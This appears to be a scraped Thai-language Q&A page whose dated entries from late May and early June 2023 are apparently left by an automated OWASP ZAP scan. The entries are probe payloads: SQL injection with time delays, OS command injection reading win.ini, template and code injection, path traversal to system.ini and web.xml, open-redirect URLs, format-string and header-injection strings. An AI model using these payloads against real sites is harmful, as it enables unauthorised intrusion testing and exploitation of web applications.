วันที่ คำถาม คำตอบ
28/05/2023 1
28/05/2023
28/05/2023
28/05/2023
28/05/2023
31/05/2023
31/05/2023
31/05/2023
31/05/2023
31/05/2023 "and/**/extractvalue(1,concat(char(126),md5(1330587444)))and"
31/05/2023 extractvalue(1,concat(char(126),md5(1654644889)))
31/05/2023
31/05/2023
31/05/2023
31/05/2023 0
31/05/2023 0
31/05/2023 "and"s"="s
31/05/2023 "and"a"="f
31/05/2023
31/05/2023
31/05/2023
31/05/2023 0
31/05/2023 0
31/05/2023 "and(select*from(select+sleep(0))a/**/union/**/select+1)="
31/05/2023 "and(select*from(select+sleep(2))a/**/union/**/select+1)="
31/05/2023 tsbbcpayltskzlpvgzpo
31/05/2023
31/05/2023 expr 862559191 + 875478777
31/05/2023 |expr 838066148 + 805036340
31/05/2023 $(expr 825793813 + 873379579)
31/05/2023 &set /A 966934559+899738913
31/05/2023 expr 824036614 + 834304657
31/05/2023 ${@var_dump(md5(558284744))};
31/05/2023 /*1*/{{821921128+994384794}}
31/05/2023 ${811566273+906537299}
31/05/2023 ${(972100767+813561058)?c}
31/05/2023 #set($c=947735501+850458513)${c}$c
31/05/2023 <%- 905020501+822954400 %>
31/05/2023 ${982947705+856415378}
01/06/2023
01/06/2023 c:/Windows/system.ini
01/06/2023 ../../../../../../../../../../../../../../../../Windows/system.ini
01/06/2023 c:Windowssystem.ini
01/06/2023 ................................Windowssystem.ini
01/06/2023 c:/
01/06/2023 /
01/06/2023 ../../../../../../../../../../../../../../../../
01/06/2023 WEB-INF/web.xml
01/06/2023 WEB-INFweb.xml
01/06/2023 /WEB-INF/web.xml
01/06/2023 WEB-INFweb.xml
01/06/2023 thishouldnotexistandhopefullyitwillnot
01/06/2023 http://www.google.com/
01/06/2023 http://www.google.com:80/
01/06/2023 http://www.google.com
01/06/2023 http://www.google.com/search?q=OWASP%20ZAP
01/06/2023 http://www.google.com:80/search?q=OWASP%20ZAP
01/06/2023 www.google.com/
01/06/2023 www.google.com:80/
01/06/2023 www.google.com
01/06/2023 www.google.com/search?q=OWASP%20ZAP
01/06/2023 www.google.com:80/search?q=OWASP%20ZAP
01/06/2023 7365197219000071732.owasp.org
01/06/2023 http://7365197219000071732.owasp.org
01/06/2023 https://7365197219000071732.owasp.org
01/06/2023 https://7365197219000071732%2eowasp%2eorg
01/06/2023 http://7365197219000071732.owasp.org
01/06/2023 https://7365197219000071732.owasp.org
01/06/2023 //7365197219000071732.owasp.org
01/06/2023
01/06/2023 "><
01/06/2023
01/06/2023 "><
01/06/2023 0W45pz4p
01/06/2023 0W45pz4p
01/06/2023 zApPX5sS
01/06/2023
01/06/2023 0W45pz4p
01/06/2023
01/06/2023 "
01/06/2023 "
01/06/2023 ;
01/06/2023 ;
01/06/2023
01/06/2023
01/06/2023 %
01/06/2023 XYZABCDEFGHIJ
01/06/2023 %
01/06/2023 XYZABCDEFGHIJ
01/06/2023 %
01/06/2023
01/06/2023
01/06/2023 / sleep(15)
01/06/2023
01/06/2023
01/06/2023
01/06/2023 case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end
01/06/2023 case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end --
01/06/2023 "case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end --
01/06/2023 / case when cast(pg_sleep(15) as varchar) > ' then 0 else 1 end
01/06/2023
01/06/2023
01/06/2023 case randomblob(100000) when not null then 1 else 1 end
01/06/2023 iftl6cghmdghybjgst9e1qldhw3n5zgvp4gt10gs1acvu8m7l3nlnpir
01/06/2023 case randomblob(1000000) when not null then 1 else 1 end
01/06/2023 case randomblob(10000000) when not null then 1 else 1 end
01/06/2023 jqeaye1c5tenud4rmcpw30279jmjz56wj5ke8fk4dhb3y8oybiqvhmbtuh
01/06/2023 case randomblob(100000000) when not null then 1 else 1 end
01/06/2023 case randomblob(1000000000) when not null then 1 else 1 end
01/06/2023 ";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var="
01/06/2023 ${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}
01/06/2023 ;print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));
01/06/2023 "+response.write([917,076*919,050)+"
01/06/2023 +response.write({0}*{1})+
01/06/2023 response.write(917,076*919,050)
01/06/2023 &sleep 1.0&
01/06/2023 ;sleep 1.0;
01/06/2023 "&sleep 1.0&"
01/06/2023 ";sleep 1.0;"
01/06/2023 type %SYSTEMROOT%win.ini
01/06/2023 &type %SYSTEMROOT%win.ini
01/06/2023 |type %SYSTEMROOT%win.ini
01/06/2023 "&type %SYSTEMROOT%win.ini&"
01/06/2023 "|type %SYSTEMROOT%win.ini
01/06/2023 &timeout /T 1.0
01/06/2023 |timeout /T 1.0
01/06/2023 "&timeout /T 1.0&"
01/06/2023 "|timeout /T 1.0
01/06/2023 get-help
01/06/2023 ;get-help
01/06/2023 ";get-help
01/06/2023 ;get-help #
01/06/2023 ;start-sleep -s 1.0
01/06/2023 ";start-sleep -s 1.0
01/06/2023 ;start-sleep -s 1.0 #
01/06/2023
01/06/2023 HyWaHTYoCMEKaJUCryrnumIOLLKGfCXxUjgJBLuljwXqYQHyyKcOHDBkhHdEKbZCdgdiaVdIHEupZHVOnVqVpPDighvmZOEGqAAxkCeVxUxKSLssrhxJUgbwaqpjxajZihLWDahiNIFWFoXXuihWpAdoFeyUWtOLPiNTvmxNfNEfRfgwbIGprbdfBYixuYMJTGQITRvIumShdIoRoAEdlTfraBdKATqBODStrgyDYqsvSEGhBmxXjsfHqepcEJEtXaehwJeiiYFcUXUjeXIqShFapboesEOuJuVxuoxQIsoUTBTfBGPrDNGhTZsBCLfnFrsPrKoJvpegdTtyDXlZrtTQRlekyYFsOjXUAdquccQAZIKXWCTmsUNseoOGVCkgbxXNCbTvffcsSEejivarxouYIknABiPPIPBXbGDAqxxZYCUFGsxbbCFbagHJPgtWpsqakHUjbcxClfVJKweBxIeYXjLvebUFrhgwBEgDJkPmpmSrPBKg
01/06/2023 ZAP
01/06/2023 ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s
01/06/2023 ZAP %1!s%2!s%3!s%4!s%5!s%6!s%7!s%8!s%9!s%10!s%11!s%12!s%13!s%14!s%15!s%16!s%17!s%18!s%19!s%20!s%21!n%22!n%23!n%24!n%25!n%26!n%27!n%28!n%29!n%30!n%31!n%32!n%33!n%34!n%35!n%36!n%37!n%38!n%39!n%40!n
01/06/2023 Set-cookie: Tamper=b3b7a896-a0e6-4a74-9cca-7006f8cc7298
01/06/2023 any Set-cookie: Tamper=b3b7a896-a0e6-4a74-9cca-7006f8cc7298
01/06/2023 any? Set-cookie: Tamper=b3b7a896-a0e6-4a74-9cca-7006f8cc7298
01/06/2023 any Set-cookie: Tamper=b3b7a896-a0e6-4a74-9cca-7006f8cc7298
01/06/2023 any? Set-cookie: Tamper=b3b7a896-a0e6-4a74-9cca-7006f8cc7298
01/06/2023 any Set-cookie: Tamper=b3b7a896-a0e6-4a74-9cca-7006f8cc7298
01/06/2023 any? Set-cookie: Tamper=b3b7a896-a0e6-4a74-9cca-7006f8cc7298
01/06/2023
01/06/2023
01/06/2023
01/06/2023 @
01/06/2023 +
01/06/2023
01/06/2023 |
01/06/2023 <
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023
01/06/2023